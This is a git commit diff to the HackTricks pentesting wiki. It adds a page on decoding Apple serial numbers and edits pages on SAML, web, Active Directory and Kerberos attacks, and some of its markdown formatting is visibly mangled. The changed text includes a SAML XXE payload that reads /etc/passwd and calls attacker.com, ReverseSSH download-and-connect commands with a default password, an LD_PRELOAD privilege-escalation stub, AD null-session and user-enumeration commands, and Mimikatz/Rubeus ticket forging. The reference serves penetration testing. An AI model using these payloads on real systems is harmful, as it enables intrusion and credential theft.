GitBook: [master] 503 pages and 11 assets modified

This commit is contained in:
CPol 2021-07-26 15:11:57 +00:00 committed by gitbook-bot
parent a1ba03233e
commit 319ab20b66
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
18 changed files with 120 additions and 76 deletions

View file

Before

Width:  |  Height:  |  Size: 341 KiB

After

Width:  |  Height:  |  Size: 341 KiB

View file

Before

Width:  |  Height:  |  Size: 341 KiB

After

Width:  |  Height:  |  Size: 341 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 341 KiB

View file

Before

Width:  |  Height:  |  Size: 10 KiB

After

Width:  |  Height:  |  Size: 10 KiB

View file

Before

Width:  |  Height:  |  Size: 10 KiB

After

Width:  |  Height:  |  Size: 10 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 10 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.3 MiB

View file

@ -56,6 +56,7 @@
## MacOS
* [MacOS Security & Privilege Escalation](macos/macos-security-and-privilege-escalation/README.md)
* [MacOS Serial Number](macos/macos-security-and-privilege-escalation/macos-serial-number.md)
* [Mac OS Architecture](macos/macos-security-and-privilege-escalation/mac-os-architecture.md)
## Windows

View file

@ -130,7 +130,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced \(search for `Section start`\).
![](../../../.gitbook/assets/image%20%28477%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%281%29.png)
![](../../../.gitbook/assets/image%20%28477%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%281%29.png)
### USB Detective

View file

@ -855,7 +855,6 @@ Save as **/tmp/pe.c**
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
void _init() {
unsetenv("LD_PRELOAD");

View file

@ -0,0 +1,76 @@
# MacOS Serial Number
Apple devices manufactured after 2010 generally have **12-character alphanumeric** serial numbers, with the **first three digits representing the manufacturing location**, the following **two** indicating the **year** and **week** of manufacture, the next **three** digits providing a **unique** **identifier**, and the **last** **four** digits representing the **model number**.
Serial number example: **C02L13ECF8J2**
### **3 - Manufacturing locations**
| Code | Factory |
| :--- | :--- |
| FC | Fountain Colorado, USA |
| F | Fremont, California, USA |
| XA, XB, QP, G8 | USA |
| RN | Mexico |
| CK | Cork, Ireland |
| VM | Foxconn, Pardubice, Czech Republic |
| SG, E | Singapore |
| MB | Malaysia |
| PT, CY | Korea |
| EE, QT, UV | Taiwan |
| FK, F1, F2 | Foxconn Zhengzhou, China |
| W8 | Shanghai China |
| DL, DM | Foxconn China |
| DN | Foxconn, Chengdu, China |
| YM, 7J | Hon Hai/Foxconn, China |
| 1C, 4H, WQ, F7 | China |
| C0 | Tech Com Quanta Computer Subsidiary, China |
| C3 | Foxxcon, Shenzhen, China |
| C7 | Pentragon, Changhai, China |
| RM | Refurbished/remanufactured |
### 1 - Year of manufacturing
| Code | Release |
| :--- | :--- |
| C | 2010/2020 \(1st half\) |
| D | 2010/2020 \(2nd half\) |
| F | 2011/2021 \(1st half\) |
| G | 2011/2021 \(2nd half\) |
| H | 2012/... \(1st half\) |
| J | 2012 \(2nd half\) |
| K | 2013 \(1st half\) |
| L | 2013 \(2nd half\) |
| M | 2014 \(1st half\) |
| N | 2014 \(2nd half\) |
| P | 2015 \(1st half\) |
| Q | 2015 \(2nd half\) |
| R | 2016 \(1st half\) |
| S | 2016 \(2nd half\) |
| T | 2017 \(1st half\) |
| V | 2017 \(2nd half\) |
| W | 2018 \(1st half\) |
| X | 2018 \(2nd half\) |
| Y | 2019 \(1st half\) |
| Z | 2019 \(2nd half\) |
### 1 - Week of manufacturing
The fifth character represent the week in which the device was manufactured. There are 28 possible characters in this spot: **the digits 1-9 are used to represent the first through ninth weeks**, and the **characters C through Y**, **excluding** the vowels A, E, I, O, and U, and the letter S, represent the **tenth through twenty-seventh weeks**. For devices manufactured in the **second half of the year, add 26** to the number represented by the fifth character of the serial number. For example, a product with a serial number whose fourth and fifth digits are “JH” was manufactured in the 40th week of 2012.
### 3 - Uniq Code
The next three digits are an identifier code which **serves to differentiate each Apple device of the same model** which is manufactured in the same location and during the same week of the same year, ensuring that each device has a different serial number.
### 4 - Serial number
The last four digits of the serial number represent the **products model**.
### Reference
{% embed url="https://beetstech.com/blog/decode-meaning-behind-apple-serial-number" %}

View file

@ -601,7 +601,7 @@ Many apps log informative \(and potentially sensitive\) messages to the console
5. Reproduce the problem.
6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.
![](../../.gitbook/assets/image%20%28466%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%281%29.png)
![](../../.gitbook/assets/image%20%28466%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%283%29.png)
You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:
@ -739,7 +739,7 @@ For **more information** about iOS cryptographic APIs and libraries access [http
The tester should be aware that **local authentication should always be enforced at a remote endpoint** or based on a cryptographic primitive. Attackers can easily bypass local authentication if no data returns from the authentication process.
The [**Local Authentication framework**](https://developer.apple.com/documentation/localauthentication) _\*\*_provides a set of APIs for developers to extend an authentication dialog to a user. In the context of connecting to a remote service, it is possible \(and recommended\) to leverage the [keychain](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/01introduction/introduction.html) for implementing local authentication.
The [**Local Authentication framework**](https://developer.apple.com/documentation/localauthentication) \_\*\*\_provides a set of APIs for developers to extend an authentication dialog to a user. In the context of connecting to a remote service, it is possible \(and recommended\) to leverage the [keychain](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/01introduction/introduction.html) for implementing local authentication.
The **fingerprint ID** sensor is operated by the [SecureEnclave security coprocessor](https://www.blackhat.com/docs/us-16/materials/us-16-Mandt-Demystifying-The-Secure-Enclave-Processor.pdf) and does not expose fingerprint data to any other parts of the system. Next to Touch ID, Apple introduced _Face ID_: which allows authentication based on facial recognition.

View file

@ -92,7 +92,7 @@ Due to the fact that SAML Responses are deflated and base64d **XML documents*
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY file SYSTEM "file:///etc/passwd">
<!ENTITY file SYSTEM "file:///etc/passwd">
<!ENTITY dtd SYSTEM "http://www.attacker.com/text.dtd" >]>
<samlp:Response ... ID="_df55c0bb940c687810b436395cf81760bb2e6a92f2" ...>
<saml:Issuer>...</saml:Issuer>
@ -244,5 +244,3 @@ with open("/home/fady/uberSAMLOIDAUTH") as urlList:
The attacks were obtained from [https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/](https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/)
You can find additional resources and write-ups in [https://epi052.gitlab.io/notes-to-self/blog/2019-03-16-how-to-test-saml-a-methodology-part-three/](https://epi052.gitlab.io/notes-to-self/blog/2019-03-16-how-to-test-saml-a-methodology-part-three/)

View file

@ -1,8 +1,8 @@
# 80,443 - Pentesting Web Methodology
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) [PEASS & HackTricks telegram group here](https://t.me/peass)**, or** follow me on Twitter ****[**🐦**](https://emojipedia.org/bird/)\*\*\*\*[**@carlospolopm**](https://twitter.com/carlospolopm).
**If you want to** share some tricks with the community **you can also submit** pull requests **to** [https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks]%28https://github.com/carlospolop/hacktricks) **that will be reflected in this book.
Don't forget to** give ⭐ on the github to motivate me to continue developing this book.
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) [PEASS & HackTricks telegram group here](https://t.me/peass)**, or** follow me on Twitter **\*\*\[**🐦**\]\(**[https://emojipedia.org/bird/\)\*\*\*\*\[](https://emojipedia.org/bird/%29****[)@carlospolopm**\]\(**[https://twitter.com/carlospolopm](https://twitter.com/carlospolopm)**\).**
If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks]%28https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.
Don't forget to\*\* give ⭐ on the github to motivate me to continue developing this book.
## Basic Info
@ -214,12 +214,12 @@ Launch some kind of **spider** inside the web. The goal of the spider is to **fi
* [**gau**](https://github.com/lc/gau) go\): HTML spider that uses external providers \(wayback, otx, commoncrawl\)
* [**ParamSpider**](https://github.com/devanshbatham/ParamSpider): This script will find URLs with parameter and will list them.
* [**galer**](https://github.com/dwisiswant0/galer) \(go\): HTML spider with JS rendering capabilities.
* [**LinkFinder**](https://github.com/GerbenJavado/LinkFinder) \(python\): HTML spider, with JS beautify capabilities capable of search new paths in JS files. It could be worth it also take a look to ****[JSScanner](https://github.com/dark-warlord14/JSScanner), which is a wrapper of LinkFinder.
* [**LinkFinder**](https://github.com/GerbenJavado/LinkFinder) \(python\): HTML spider, with JS beautify capabilities capable of search new paths in JS files. It could be worth it also take a look to _\*\*_[JSScanner](https://github.com/dark-warlord14/JSScanner), which is a wrapper of LinkFinder.
* [**JSParser**](https://github.com/nahamsec/JSParser) \(python2.7\): A python 2.7 script using Tornado and JSBeautifier to parse relative URLs from JavaScript files. Useful for easily discovering AJAX requests. Looks like unmaintaned.
* [**relative-url-extractor**](https://github.com/jobertabma/relative-url-extractor) \(ruby\): Given a file \(HTML\) it will extract URLs from it using nifty regular expression to find and extract the relative URLs from ugly \(minify\) files.
* \*\*\*\*[**JSFScan**](https://github.com/KathanP19/JSFScan.sh) \(bash, several tools\): Gather interesting information from JS files using several tools.
* \*\*\*\*[**subjs**](https://github.com/lc/subjs) \(go\): Find JS files.
* [**page-fetch**](https://github.com/detectify/page-fetch) ****\(go\): Load a page in a headless browser and print out all the urls loaded to load the page.
* [**page-fetch**](https://github.com/detectify/page-fetch) _\*\*_\(go\): Load a page in a headless browser and print out all the urls loaded to load the page.
### Brute Force directories and files
@ -256,7 +256,7 @@ _Note that anytime a new directory is discovered during brute-forcing or spideri
* [**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): Find broken links inside HTMLs that may be prone to takeovers
* **File Backups**: Once you have found all the files, look for backups of all the executable files \("_.php_", "_.aspx_"...\). Common variations for naming a backup are: _file.ext~, \#file.ext\#, ~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old._ You can also use the tool [**bfac**](https://github.com/mazen160/bfac).
* **Discover new parameters**: You can use tools like [**Arjun**](https://github.com/s0md3v/Arjun)**,** [**parameth**](https://github.com/maK-/parameth)**,** [**x8**](https://github.com/sh1yo/x8) ****and ****[**Param Miner**](https://github.com/PortSwigger/param-miner) **to discover hidden parameters. If you can, you could try to search** hidden parameters on each executable web file.
* **Discover new parameters**: You can use tools like [**Arjun**](https://github.com/s0md3v/Arjun)**,** [**parameth**](https://github.com/maK-/parameth)**,** [**x8**](https://github.com/sh1yo/x8) **and** [**Param Miner**](https://github.com/PortSwigger/param-miner) **to discover hidden parameters. If you can, you could try to search** hidden parameters on each executable web file.
* _Arjun all default wordlists:_ [https://github.com/s0md3v/Arjun/tree/master/arjun/db](https://github.com/s0md3v/Arjun/tree/master/arjun/db)\_\_
* _Param-miner “params” :_ [https://github.com/PortSwigger/param-miner/blob/master/resources/params](https://github.com/PortSwigger/param-miner/blob/master/resources/params)\_\_
* _Assetnote “parameters\_top\_1m”:_ [https://wordlists.assetnote.io/](https://wordlists.assetnote.io/)\_\_
@ -264,7 +264,7 @@ _Note that anytime a new directory is discovered during brute-forcing or spideri
* **Comments:** Check the comments of all the files, you can find **credentials** or **hidden functionality**.
* If you are playing **CTF**, a "common" trick is to **hide** **information** inside comments at the **right** of the **page** \(using **hundreds** of **spaces** so you don't see the data if you open the source code with the browser\). Other possibility is to use **several new lines** and **hide information** in a comment at the **bottom** of the web page.
* **API keys**: If you **find any API key** there is guide that indicates how to use API keys of different platforms: [keyhacks](https://github.com/streaak/keyhacks), [**zile**](https://github.com/xyele/zile.git)**,** [truffleHog](https://github.com/dxa4481/truffleHog/), [SecretFinder](https://github.com/m4ll0k/SecretFinder), [RegHex](https://github.com/l4yton/RegHex%29\).
* Google API keys: If you find any API key looking like **AIza**SyA-qLheq6xjDiEIRisP\_ujUseYLQCHUjik you can use the project [**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner) ****to check which apis the key can access.
* Google API keys: If you find any API key looking like **AIza**SyA-qLheq6xjDiEIRisP\_ujUseYLQCHUjik you can use the project [**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner) _\*\*_to check which apis the key can access.
* **S3 Buckets**: While spidering look if any **subdomain** or any **link** is related with some **S3 bucket**. In that case, [**check** the **permissions** of the bucket](buckets/).
### Special findings
@ -359,8 +359,6 @@ You can **automate** this using the **nmap plugin** "_http-ntlm-info.nse_".
It is possible to **put content** inside a **Redirection**. This content **won't be shown to the user** \(as the browser will execute the redirection\) but something could be **hidden** in there.
## Web Vulnerabilities Checking
Now that a comprehensive enumeration of the web application has been performed it's time to check for a lot of possible vulnerabilities. You can find the checklist here:

View file

@ -2,8 +2,7 @@
## Full TTY
Note that the shell you set in the `SHELL` variable **must** be **listed inside** _**/etc/shells**_ or `The value for the SHELL variable was not found the /etc/shells file
This incident has been reported`. Also note that the next snippets only work in bash. If you're in a zsh, change to a bash before obtaining the shell by running `bash`.
Note that the shell you set in the `SHELL` variable **must** be **listed inside** _**/etc/shells**_ or `The value for the SHELL variable was not found the /etc/shells file This incident has been reported`. Also note that the next snippets only work in bash. If you're in a zsh, change to a bash before obtaining the shell by running `bash`.
```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
@ -53,7 +52,7 @@ wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_revers
/dev/shm/reverse-ssh -v -l :4444
```
2. (a) Linux target:
* \(2a\) Linux target:
```bash
# Drop it via your preferred way, e.g.
@ -62,16 +61,16 @@ wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_revers
/dev/shm/reverse-ssh -p 4444 kali@10.0.0.2
```
2. (b) Windows 10 target (for earlier versions, check [project readme](https://github.com/Fahrj/reverse-ssh#features)):
* \(2b\) Windows 10 target \(for earlier versions, check [project readme](https://github.com/Fahrj/reverse-ssh#features)\):
```powershell
```bash
# Drop it via your preferred way, e.g.
certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe
reverse-ssh.exe -p 4444 kali@10.0.0.2
```
3. If the ReverseSSH port forwarding request was successful, you should now be able to log in with default password `letmeinbrudipls` in the context of the user running `reverse-ssh(.exe)`:
* If the ReverseSSH port forwarding request was successful, you should now be able to log in with default password `letmeinbrudipls` in the context of the user running `reverse-ssh(.exe)`:
```bash
# Interactive shell access

View file

@ -41,66 +41,39 @@ To learn how to **attack an AD** you need to **understand** really good the **Ke
## Cheat Sheet
### Tools and methodology
![Orange-cyberdefense/Arsenal](https://raw.githubusercontent.com/Orange-Cyberdefense/arsenal/master/mindmap/pentest_ad.png)
### Commands Cheat Sheet
You can take a lot to [https://wadcoms.github.io/](https://wadcoms.github.io/) to have a quick view of which commands you can run to enumerate/exploit an AD.
## Active Directory Reconnaissance (***No creds***)
## Recon Active Directory \(No creds/sessions\)
If you just have access to an AD environment but you don't have any credentials/sessions you could:
* **Network scanning**:
* See [Pentesting Network](../../pentesting/pentesting-network#scanning-hosts)
* **Check for null access**:
* `enum4linux -a -u "" -p "" <DC IP>`
* `smbmap -u "" -p "" -P 445 -H <DC IP>`
* `smbclient -U '%' -L //<DC IP>`
* `cme smb <IP> -u '' -p ''`
* **Check for guest access**:
* `enum4linux -a -u "guest" -p "" <DC IP>`
* `smbmap -u "guest" -p "" -P 445 -H <DC IP>`
* `smbclient -U 'guest%' -L //<IP>`
* `cme smb <IP> -u 'a' -p ''`
* **Pentest the network:** Scan the network, find machines and open ports and try to **exploit vulnerabilities** or **extract credentials** from them \(for example, [printers could be very interesting targets](ad-information-in-printers.md)**. Take a look to the General** [**Pentesting Methodology**](../../pentesting-methodology.md) to find more information about how to do this.
* **Check for null and Guest access on smb services** \(this won't work on modern Windows versions\):
* `enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>`
* `smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>`
* `smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //`
* [**A more detailed guide on how to enumerate a SMB server can be found here.**](../../pentesting/pentesting-smb.md)
* **Enumerate Ldap**:
* `nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>`
* `ldapsearch -x -h <IP> -s base`
* `ldapsearch -x -h <IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TDL>"`
* [**A more detailed guide on how to enumerate LDAP can be found here.**](../../pentesting/pentesting-ldap.md)
* **Cleartext credentials**:
Some fields as *UserPassword, UnixUserPassword, unicodePwd and msSFU30Password* can contain passwords.
* `Get-GPPPassword.py -no-pass <IP>`
* `crackmapexec ldap <IP> -u '' -p '' <IP> -M gpp_password`
* `enum4linux | grep -i desc`
* `crackmapexec ldap <IP> -u '' -p '' --kdcHost <IP> -M get-desc-users`
* `crackmapexec ldap <IP> -u '' -p '' <IP> -M gpp_autologin`
* **Zerologon**: [dirkjanm/CVE-2020-1472](https://github.com/dirkjanm/CVE-2020-1472)
* **EternalBlue**: [exploit/windows/smb/ms17_010_eternalblue](https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/)
* **Network poisoning**
* Gather credentials [impersonating services with Responder](../../pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
* Access host by [abusing the relay attack](../../pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)
* Gather credentials **exposing** [fake UPnP services with evil-S](../../pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md)[**SDP**](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)
* **OSINT**: Try to *extract possible usernames* from web services inside the domain environments and also from the publicly available web pages of the company. If you find the complete names of company workers, you could try different *AD username conventions* ([read this](https://activedirectorypro.com/active-directory-user-naming-convention/)). You could also try statistically most used usernames: [https://github.com/insidetrust/statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames).
* **Poison the network**
* Gather credentials [**impersonating services with Responder**](../../pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
* Access host by [abusing the relay attack](../../pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)\*\*\*\*
* Gather credentials **exposing** [**fake UPnP services with evil-S**](../../pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md)[**SDP**](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)
* **OSINT**: Try to **extract possible usernames** from services \(mainly web\) inside the domain environments and also from the publicly available web pages of the company. If you find the complete names of company workers, you could try different AD **username conventions \(**[**read this**](https://activedirectorypro.com/active-directory-user-naming-convention/)**\)**. The most common conventions are: _NameSurname_, _Name.Surname_, _NamSur_ \(3letters of each\), _Nam.Sur_, _NSurname_, _N.Surname_, _SurnameName_, _Surname.Name_, _SurnameN_, _Surname.N_, 3 _random letters and 3 random numbers_ \(abc123\). You could also try **statistically most used usernames**: [https://github.com/insidetrust/statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames) **Read the following Username enumeration section to learn how to find if a username is valid or not.**
### User enumeration
When an **invalid username is requested** the server will respond using the **Kerberos error** code _*KRB5KDC\_ERR\_C\_PRINCIPAL\_UNKNOWN*_, allowing us to determine that the username was invalid. However **Valid usernames** will illicit either the **TGT in a AS-REP** response **or** the error _*KRB5KDC\_ERR\_PREAUTH\_REQUIRED*_, indicating that the user is required to perform pre-authentication.
When an **invalid username is requested** the server will respond using the **Kerberos error** code _**KRB5KDC\_ERR\_C\_PRINCIPAL\_UNKNOWN**_, allowing us to determine that the username was invalid. **Valid usernames** will illicit either the **TGT in a AS-REP** response **or** the error _**KRB5KDC\_ERR\_PREAUTH\_REQUIRED**_, indicating that the user is required to perform pre-authentication.
#### Enumeration
* `enum4linux -U 10.10.10.161 | grep 'user:' | sed 's/user:\[//g' | sed 's/\]//g' | awk '{print $1}'`
* `nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN'" <IP>`
#### List based
Build your own userlist.
* `nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='<domain>',userdb=/root/Desktop/usernames.txt <IP>`
* `msf> use auxiliary/gather/kerberos_enumusers`
* `./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt`
* `crackmapexec smb <IP> -u '' -p '' --users`
```text
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN'" <IP>
Nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='<domain>',userdb=/root/Desktop/usernames.txt <IP>
msf> use auxiliary/gather/kerberos_enumusers
./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
crackmapexec smb dominio.es -u '' -p '' --users | awk '{print $4}' | uniq
enum4linux -U 10.10.10.161 | grep 'user:' | sed 's/user:\[//g' | sed 's/\]//g' | awk '{print $1}'
```
You could also use the **impacket script of ASREPRoast** to enumerate valid usernames.
@ -110,7 +83,7 @@ Ok, so you know you have already a valid username but no passwords...Then try:
* [**ASREPRoast**](asreproast.md): If a user **doesn't have** the attribute _**DONT\_REQ\_PREAUTH**_ you can **request a AS\_REP message** for that user that will contain some data encrypted by a derivation of the password of the user.
* [**Password Spraying**](password-spraying.md): Let's **try** the most **common passwords** with each of the discovered users, maybe some user is using a bad password \(keep in mind the password policy\)
* A final option if the accounts **cannot be locked** is the [traditional bruteforce](password-spraying.md)
* A final option if the accounts cannot be locked is the [**traditional bruteforce**](password-spraying.md)\*\*\*\*
## Enumerating Active Directory \(Some creds/Session\)

View file

@ -16,7 +16,7 @@ python psexec.py jurassic.park/stegosaurus@labwws02.jurassic.park -k -no-pass
```
{% endcode %}
In Windows, **Mimikatz** can be used to **craft** the **ticket**. Next, the ticket is **injected** with **Rubeus**, and finally a remote shell can be obtained thanks to **PsExec**.
In Windows, **Mimikatz** can be used to **craft** the **ticket**. Next, the ticket is **injected** with **Rubeus**, and finally a remote shell can be obtained thanks to **PsExec**.
{% code title="Windows" %}
```bash
@ -30,7 +30,7 @@ mimikatz.exe "kerberos::ptt ticket.kirbi"
```
{% endcode %}
The **CIFS** service is the one that allows you to **access the file system of the victim**. You can find other services here: [**https://adsecurity.org/?page\_id=183**](https://adsecurity.org/?page_id=183)**.** For example, you can use the **HOST service** to create a _**schtask**_ in a computer. Then you can check if this has worked trying to list the tasks of the victim: `schtasks /S <hostname>` or you can use the **HOST and** **RPCSS service** to execute **WMI** queries in a computer, test it doing: `Get-WmiObject -Class win32_operatingsystem -ComputerName <hostname>`
The **CIFS** service is the one that allows you to **access the file system of the victim**. You can find other services here: [**https://adsecurity.org/?page\_id=183**](https://adsecurity.org/?page_id=183)**.** For example, you can use the **HOST service** to create a _**schtask**_ in a computer. Then you can check if this has worked trying to list the tasks of the victim: `schtasks /S <hostname>` or you can use the **HOST and** **RPCSS service** to execute **WMI** queries in a computer, test it doing: `Get-WmiObject -Class win32_operatingsystem -ComputerName <hostname>`
### Mitigation